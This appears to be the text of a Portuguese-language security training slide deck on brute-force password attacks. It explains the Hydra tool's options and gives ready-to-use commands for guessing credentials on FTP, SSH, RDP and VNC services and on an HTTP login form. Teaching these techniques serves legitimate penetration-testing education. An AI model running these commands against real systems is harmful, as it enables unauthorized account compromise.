Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Temas de Hoje:
Brute Force
Conhecendo Hydra
Modos de Uso
Atacando Servios Padro
Atacando HTTP Post Form
Brinde! Wordlists grtis
O Hydra tem suporte aos servios Telnet, Formulrio HTTP/HTTPS, SSH, MySQL,
PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.
A ferramenta j vem toda instalada e configurada (inclusive com interface grfica)
no BackTrack, porm, caso no tenha instalado, basta fazer o download do cdigofonte e compil-la em qualquer distribuio.
Opes da ferramenta:
-l = Nome/login da vtima;
-L = Carrega uma lista contendo nomes/logins de vtimas (1 por linha);
-p = Especifica senha nica;
-P = Carrega uma lista com senhas (1 por linha);
-e = Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass;
-C = Usado para carregar um arquivo contendo usurio:senha. Formato
usurio:senha equivale a - L/-P;
-M = Carrega lista de servidores alvos (1 por linha);
-o = Salva as senhas encontradas dentro do arquivo que voc especificar;
-f = Faz o programa parar de trabalhar quando a senha ou usurio for
encontrada[o];
-t = Limita o numero de solicitaes por vez (default: 16);
-w = Define o tempo mximo em segundos para esperar resposta do servidor
(default: 30s);
-v / -V = Modo verbose do programa. 'V' mostra todas tentativas.
Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando servios RDP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 rdp
Atacando servios VNC:
# hydra -L wordlist -P wordlist -v 192.168.2.100 vnc
Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp -vV
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando websites com usurio e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
Brinde: Wordlists
Tcnicas de Invaso Brute Force
www.eSecurity.com.br
E-mail: alan.sanches@esecurity.com.br
Twitter: @esecuritybr e @desafiohacker
Skype: desafiohacker
Fanpage: www.facebook.com/academiahacker